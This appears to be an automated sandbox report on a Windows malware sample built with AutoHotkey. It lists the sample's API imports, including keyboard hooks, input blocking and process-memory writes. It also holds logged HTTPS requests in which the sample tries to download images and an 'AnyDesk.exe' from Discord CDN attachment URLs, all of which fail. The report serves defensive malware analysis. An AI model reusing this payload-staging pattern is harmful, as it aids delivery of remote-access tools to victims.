COMCTL32.dll	ImageList_Create, CreateStatusWindowW, ImageList_ReplaceIcon, ImageList_GetIconSize, ImageList_Destroy, ImageList_AddMasked
PSAPI.DLL	GetProcessImageFileNameW, GetModuleBaseNameW, GetModuleFileNameExW
WININET.dll	InternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFileExA, InternetReadFile
KERNEL32.dll	GetModuleFileNameW, GetSystemTimeAsFileTime, FindResourceW, SizeofResource, LoadResource, LockResource, GetFullPathNameW, GetShortPathNameW, FindFirstFileW, FindNextFileW, FindClose, FileTimeToLocalFileTime, SetEnvironmentVariableW, Beep, MoveFileW, OutputDebugStringW, CreateProcessW, GetFileAttributesW, WideCharToMultiByte, MultiByteToWideChar, GetExitCodeProcess, WriteProcessMemory, ReadProcessMemory, GetCurrentProcessId, OpenProcess, TerminateProcess, SetPriorityClass, SetLastError, GetEnvironmentVariableW, GetLocalTime, GetDateFormatW, GetTimeFormatW, GetDiskFreeSpaceExW, SetVolumeLabelW, CreateFileW, DeviceIoControl, GetDriveTypeW, GetVolumeInformationW, GetDiskFreeSpaceW, GetCurrentDirectoryW, CreateDirectoryW, ReadFile, WriteFile, DeleteFileW, SetFileAttributesW, LocalFileTimeToFileTime, SetFileTime, DeleteCriticalSection, GetSystemTime, GetSystemDefaultUILanguage, GetComputerNameW, GetSystemWindowsDirectoryW, GetTempPathW, EnterCriticalSection, LeaveCriticalSection, VirtualProtect, QueryDosDeviceW, CompareStringW, RemoveDirectoryW, CopyFileW, GetCurrentProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, WritePrivateProfileSectionW, SetEndOfFile, GetACP, GetFileType, GetStdHandle, SetFilePointerEx, SystemTimeToFileTime, FileTimeToSystemTime, GetFileSize, IsWow64Process, VirtualAllocEx, VirtualFreeEx, EnumResourceNamesW, LoadLibraryExW, GlobalSize, HeapReAlloc, EncodePointer, HeapFree, DecodePointer, ExitProcess, HeapAlloc, IsValidCodePage, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, InitializeCriticalSection, GetCPInfo, GetVersionExW, GetModuleHandleW, FreeLibrary, GetProcAddress, LoadLibraryW, GetLastError, CreateMutexW, CloseHandle, GetExitCodeThread, SetThreadPriority, CreateThread, GetStringTypeExW, lstrcmpiW, GetCurrentThreadId, GlobalUnlock, GlobalFree, GlobalAlloc, GlobalLock, SetErrorMode, SetCurrentDirectoryW, Sleep, GetTickCount, MulDiv, RtlCaptureContext, HeapSetInformation, GetVersion, HeapCreate, InitializeCriticalSectionAndSpinCount, HeapSize, HeapQueryInformation, GetCommandLineW, GetStartupInfoW, RtlUnwindEx, GetStringTypeW, RaiseException, RtlPcToFileHeader, LCMapStringW, GetConsoleCP, GetConsoleMode, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, QueryPerformanceCounter, GetOEMCP, SetFilePointer, WriteConsoleW, SetStdHandle, FlushFileBuffers, GetFileSizeEx, GetProcessHeap
USER32.dll	GetDlgItem, SetDlgItemTextW, MessageBeep, GetCursorInfo, GetLastInputInfo, GetSystemMenu, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuStringW, ExitWindowsEx, SetMenu, FlashWindow, GetPropW, SetPropW, RemovePropW, MapWindowPoints, RedrawWindow, SetWindowLongPtrW, SetParent, GetClassInfoExW, DefDlgProcW, GetAncestor, UpdateWindow, GetMessagePos, GetClassLongPtrW, CallWindowProcW, CheckRadioButton, IntersectRect, GetUpdateRect, PtInRect, CreateDialogIndirectParamW, GetWindowLongPtrW, CreateAcceleratorTableW, DestroyAcceleratorTable, InsertMenuItemW, SetMenuDefaultItem, RemoveMenu, SetMenuItemInfoW, IsMenu, GetMenuItemInfoW, CreateMenu, CreatePopupMenu, SetMenuInfo, AppendMenuW, DestroyMenu, TrackPopupMenuEx, CopyImage, CreateIconIndirect, CreateIconFromResourceEx, EnumClipboardFormats, GetWindow, BringWindowToTop, MessageBoxW, GetTopWindow, GetQueueStatus, SendDlgItemMessageW, SetClipboardViewer, LoadAcceleratorsW, EnableMenuItem, GetMenu, CreateWindowExW, RegisterClassExW, LoadCursorW, DestroyWindow, EnableWindow, MapVirtualKeyW, VkKeyScanExW, MapVirtualKeyExW, GetKeyboardLayoutNameW, ActivateKeyboardLayout, GetGUIThreadInfo, GetWindowTextW, mouse_event, WindowFromPoint, GetSystemMetrics, keybd_event, SetKeyboardState, GetKeyboardState, GetCursorPos, GetAsyncKeyState, AttachThreadInput, SendInput, UnregisterHotKey, RegisterHotKey, SendMessageTimeoutW, UnhookWindowsHookEx, SetWindowsHookExW, PostThreadMessageW, IsCharAlphaNumericW, IsCharUpperW, IsCharLowerW, ToUnicodeEx, GetKeyboardLayout, CallNextHookEx, CharLowerW, ReleaseDC, GetDC, OpenClipboard, GetClipboardData, GetClipboardFormatNameW, CloseClipboard, SetClipboardData, EmptyClipboard, PostMessageW, FindWindowW, EndDialog, IsWindow, DispatchMessageW, TranslateMessage, ShowWindow, CountClipboardFormats, SetWindowLongW, ScreenToClient, IsDialogMessageW, DialogBoxParamW, SetForegroundWindow, DefWindowProcW, FillRect, DrawIconEx, GetSysColorBrush, GetSysColor, RegisterWindowMessageW, EnumDisplayMonitors, IsIconic, IsZoomed, EnumWindows, ChangeClipboardChain, GetWindowTextLengthW, SendMessageW, IsWindowEnabled, GetWindowLongW, GetKeyState, TranslateAcceleratorW, KillTimer, PeekMessageW, GetFocus, GetClassNameW, GetWindowThreadProcessId, GetForegroundWindow, InvalidateRect, SetLayeredWindowAttributes, SetWindowPos, SetWindowRgn, SetFocus, SetActiveWindow, ClientToScreen, EnumChildWindows, MoveWindow, GetWindowRect, GetMonitorInfoW, MonitorFromPoint, GetClientRect, SystemParametersInfoW, AdjustWindowRectEx, DrawTextW, SetRect, GetIconInfo, SetWindowTextW, IsWindowVisible, BlockInput, GetMessageW, SetTimer, GetParent, GetDlgCtrlID, CharUpperW, IsClipboardFormatAvailable, CheckMenuItem, PostQuitMessage, IsCharAlphaW, LoadImageW, DestroyIcon
GDI32.dll	GetPixel, GetClipRgn, GetCharABCWidthsW, SetBkMode, CreatePatternBrush, SetBrushOrgEx, EnumFontFamiliesExW, CreateDIBSection, GdiFlush, SetBkColor, ExcludeClipRect, SetTextColor, GetClipBox, BitBlt, CreateCompatibleBitmap, GetSystemPaletteEntries, GetDIBits, CreateCompatibleDC, CreatePolygonRgn, CreateRectRgn, CreateRoundRectRgn, CreateEllipticRgn, DeleteDC, GetObjectW, GetTextMetricsW, GetTextFaceW, SelectObject, GetStockObject, CreateDCW, CreateSolidBrush, CreateFontW, FillRgn, GetDeviceCaps, DeleteObject
COMDLG32.dll	CommDlgExtendedError, GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, GetUserNameW, RegEnumKeyExW, RegEnumValueW, RegQueryInfoKeyW, RegOpenKeyExW, RegCloseKey, RegConnectRegistryW, RegDeleteValueW
SHELL32.dll	DragQueryPoint, SHEmptyRecycleBinW, SHFileOperationW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetDesktopFolder, SHGetMalloc, SHGetFolderPathW, ShellExecuteExW, Shell_NotifyIconW, DragFinish, DragQueryFileW, ExtractIconW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, CoInitialize, CoUninitialize, CLSIDFromString, CLSIDFromProgID, CoGetObject, StringFromGUID2, CreateStreamOnHGlobal
OLEAUT32.dll	SafeArrayGetLBound, GetActiveObject, SysStringLen, OleLoadPicture, SafeArrayUnaccessData, SafeArrayGetElemsize, SafeArrayAccessData, SafeArrayUnlock, SafeArrayPtrOfIndex, SafeArrayLock, SafeArrayGetDim, SafeArrayDestroy, SafeArrayGetUBound, VariantCopyInd, SafeArrayCopy, SysAllocString, VariantChangeType, VariantClear, SafeArrayCreate, SysFreeString

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 05:21:00.664577961 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.664613962 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:00.664685965 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.673480034 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.673494101 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:00.875636101 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:00.875713110 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.934186935 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.934207916 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:00.934608936 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:00.934669018 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.936556101 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:00.980248928 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.112256050 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.112315893 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.112387896 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.175560951 CET	49699	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.175581932 CET	443	49699	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.262047052 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.262099028 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.262161970 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.262671947 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.262686014 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.458328962 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.458533049 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.459232092 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.459239006 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.459527016 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.459534883 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.702513933 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.702580929 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.702626944 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.702658892 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.703542948 CET	49700	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.703555107 CET	443	49700	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.730220079 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.730247021 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.730350018 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.730611086 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.730626106 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.931878090 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.932028055 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.932693958 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.932703972 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:01.932864904 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:01.932868958 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.178917885 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.178976059 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.179014921 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.179014921 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.179826021 CET	49701	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.179840088 CET	443	49701	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.198914051 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.198941946 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.199052095 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.199300051 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.199312925 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.393943071 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.394047022 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.394874096 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.394881010 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.395133972 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.395138025 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.635430098 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.635487080 CET	443	49702	162.159.133.233	192.168.2.6
Mar 29, 2024 05:21:02.635550022 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.636192083 CET	49702	443	192.168.2.6	162.159.133.233
Mar 29, 2024 05:21:02.636209011 CET	443	49702	162.159.133.233	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 05:21:00.562293053 CET	53702	53	192.168.2.6	1.1.1.1
Mar 29, 2024 05:21:00.657572985 CET	53	53702	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 29, 2024 05:21:00.562293053 CET	192.168.2.6	1.1.1.1	0xac19	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 29, 2024 05:21:00.657572985 CET	1.1.1.1	192.168.2.6	0xac19	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Mar 29, 2024 05:21:00.657572985 CET	1.1.1.1	192.168.2.6	0xac19	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Mar 29, 2024 05:21:00.657572985 CET	1.1.1.1	192.168.2.6	0xac19	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Mar 29, 2024 05:21:00.657572985 CET	1.1.1.1	192.168.2.6	0xac19	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Mar 29, 2024 05:21:00.657572985 CET	1.1.1.1	192.168.2.6	0xac19	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	162.159.133.233	443	5924	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-29 04:21:00 UTC	245	OUT	GET /attachments/946434985617944649/1187447469743804447/1img.png?ex=6596eba2&is=658476a2&hm=0a3291a0428a9a3a412cccb212e697c45efde312d3ae0a17818b7bba37eb978d& HTTP/1.1 User-Agent: AutoHotkey Host: cdn.discordapp.com Cache-Control: no-cache
2024-03-29 04:21:01 UTC	1062	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Mar 2024 04:21:01 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; path=/; expires=Fri, 29-Mar-24 04:51:01 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8V6xnPq1xbTgxH6gOWx21TemBvlKNtiv4oscg8DiiDreyU66khMHs4Y04SDY0%2Fupk7IHVOnOqHwUHTqOrzN45cRFfo3n9JskjwMUGXcz5%2FktyKp%2BKhQlCKtHeTGcuLzsaL3tlQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 86bd12198ddc05ce-IAD alt-svc: h3=":443"; ma=86400
2024-03-29 04:21:01 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49700	162.159.133.233	443	5924	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-29 04:21:01 UTC	497	OUT	GET /attachments/946434985617944649/1187447469492150292/3img.png?ex=6596eba2&is=658476a2&hm=e54785c353dcbe635c35016ed6a0babbb34588ac67d1176df058c308ee2bef44& HTTP/1.1 User-Agent: AutoHotkey Host: cdn.discordapp.com Cache-Control: no-cache Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
2024-03-29 04:21:01 UTC	625	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Mar 2024 04:21:01 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbHSRBjCGkqqNTK04oK6XceWlvmYyEiRupfFt2LLROR3P43X0Ng54r0g2dclIl1HE88oLzk4M0P8t3AwSofZllPcyza%2F6MyRYbVWEh0aP0Vw3%2Bc2LpY2qDoO3F5OHhxDHD7biA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86bd121d38785a40-IAD alt-svc: h3=":443"; ma=86400
2024-03-29 04:21:01 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49701	162.159.133.233	443	5924	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-29 04:21:01 UTC	497	OUT	GET /attachments/946434985617944649/1187447469185974412/2img.png?ex=6596eba2&is=658476a2&hm=ceac553c8fa20a5a29d3a30fafcd5022ef44d33396c849d1a84b29a8507c87e5& HTTP/1.1 User-Agent: AutoHotkey Host: cdn.discordapp.com Cache-Control: no-cache Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
2024-03-29 04:21:02 UTC	631	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Mar 2024 04:21:02 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjSik6EHcLiOpxxP1xAL6k%2BoMUGw42udkdzosPaF0VZ%2BoORFcx16y%2BGQX1GRx3Mh4cXbZf85fCscxFE4RUVXQs68LbsaTji7m4%2BEp4Nuuiu69k%2F5y4Ozg5cxfzbaFkoIylpYPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86bd12203afa5a45-IAD alt-svc: h3=":443"; ma=86400
2024-03-29 04:21:02 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49702	162.159.133.233	443	5924	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-29 04:21:02 UTC	500	OUT	GET /attachments/946434985617944649/1187449788539613234/AnyDesk.exe?ex=6596edcb&is=658478cb&hm=1ccb90ac0e74e5fc5ff101f4716703308a02fb42540256a74e81a4d808fbe4ef& HTTP/1.1 User-Agent: AutoHotkey Host: cdn.discordapp.com Cache-Control: no-cache Cookie: __cf_bm=WAgSjmN_wP2eFedjicHfRrdUiKndDMaS86a4K75qnaQ-1711686061-1.0.1.1-w9CFE_AePNDy_Wk3xZI6zK2dF1cZjaN2undiK6NtC2SylUPBRZx1h1rEe28blv8UENKQFkTayXcFWGs54KEpLA; _cfuvid=NokBoZytmEIMqSMZLzeheyttRjABninEj.riDLOMx_M-1711686061063-0.0.1.1-604800000
2024-03-29 04:21:02 UTC	631	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Mar 2024 04:21:02 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjW5pURb%2BDcAIYFDC%2B%2B%2FKrte0TLhDJBEVjIZiQkp1uzrOEETOhAlg2bXCSWmxOxdAJeOABUb7IbycRwGXfD6OsxsjnQSEP4FEpLL0Ss9iQlfC5aJCmTvIGhKHH%2F38PLNLM2bdw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86bd122319af20ba-IAD alt-svc: h3=":443"; ma=86400
2024-03-29 04:21:02 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Target ID:	0
Start time:	05:20:59
Start date:	29/03/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.14270.3068.exe"
Imagebase:	0x140000000
File size:	1'277'440 bytes
MD5 hash:	DFBAF344699830430AE052254168D580
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.5%
Total number of Nodes:	986
Total number of Limit Nodes:	33

Executed Functions

Function 0000000140056130 Relevance: 65.2, APIs: 35, Strings: 2, Instructions: 462
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterWindowMessageW.USER32 ref: 000000014005616D

Strings

TaskbarCreated, xrefs: 0000000140056160
, xrefs: 0000000140056574

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: $TaskbarCreated
API String ID: 1814269913-2756569325
Opcode ID: 502ea42f54506aedd61420d2f51a668baccd834887dd1654717699d76187291d
Instruction ID: 1ef47505efe1a2c38c15dc43d22e269b7b58355a0c2051809d8268e627ce1eef
Opcode Fuzzy Hash: 502ea42f54506aedd61420d2f51a668baccd834887dd1654717699d76187291d
Instruction Fuzzy Hash: 1B2279312046408AEB6ACF63E4447EA77A1F78CBD4F544525EB8A57BB4DF3AD884CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001EF90 Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 233
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400AF3A0: LoadLibraryExW.KERNEL32 ref: 00000001400AF3D3
Part of subcall function 00000001400AF3A0: FindResourceW.KERNEL32 ref: 00000001400AF458
Part of subcall function 00000001400AF3A0: LoadResource.KERNEL32 ref: 00000001400AF46D
Part of subcall function 00000001400AF3A0: LockResource.KERNEL32 ref: 00000001400AF47F
Part of subcall function 00000001400AF3A0: GetSystemMetrics.USER32 ref: 00000001400AF49F
Part of subcall function 00000001400AF3A0: FindResourceW.KERNEL32 ref: 00000001400AF515
Part of subcall function 00000001400AF3A0: LoadResource.KERNEL32 ref: 00000001400AF529
Part of subcall function 00000001400AF3A0: LockResource.KERNEL32 ref: 00000001400AF537

GetSystemMetrics.USER32 ref: 000000014001F028

Part of subcall function 00000001400AF3A0: EnumResourceNamesW.KERNEL32 ref: 00000001400AF43B
Part of subcall function 00000001400AF3A0: SizeofResource.KERNEL32 ref: 00000001400AF54B
Part of subcall function 00000001400AF3A0: CreateIconFromResourceEx.USER32 ref: 00000001400AF56E

LoadCursorW.USER32 ref: 000000014001F06A
RegisterClassExW.USER32 ref: 000000014001F095
RegisterClassExW.USER32 ref: 000000014001F0BC
GetForegroundWindow.USER32 ref: 000000014001F0F3
GetClassNameW.USER32 ref: 000000014001F10F
CreateWindowExW.USER32 ref: 000000014001F192
GetMenu.USER32 ref: 000000014001F1B7
EnableMenuItem.USER32 ref: 000000014001F1CE
CreateWindowExW.USER32 ref: 000000014001F236
GetDC.USER32 ref: 000000014001F293
GetDeviceCaps.GDI32 ref: 000000014001F2BD
MulDiv.KERNEL32 ref: 000000014001F2CE
CreateFontW.GDI32 ref: 000000014001F312
ReleaseDC.USER32 ref: 000000014001F329
SendMessageW.USER32 ref: 000000014001F344
SendMessageW.USER32 ref: 000000014001F35C
ShowWindow.USER32 ref: 000000014001F36B
ShowWindow.USER32 ref: 000000014001F37A
ShowWindow.USER32 ref: 000000014001F399
SetWindowLongW.USER32 ref: 000000014001F3AD
LoadAcceleratorsW.USER32 ref: 000000014001F3BF

Strings

P, xrefs: 000000014001F002
edit, xrefs: 000000014001F1FD
Shell_TrayWnd, xrefs: 000000014001F119
AutoHotkey, xrefs: 000000014001EFD7
Consolas, xrefs: 000000014001F2AA
Lucida Console, xrefs: 000000014001F2A0
AutoHotkey2, xrefs: 000000014001F0A0
CreateWindow, xrefs: 000000014001F24C
RegClass, xrefs: 000000014001F0CB

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
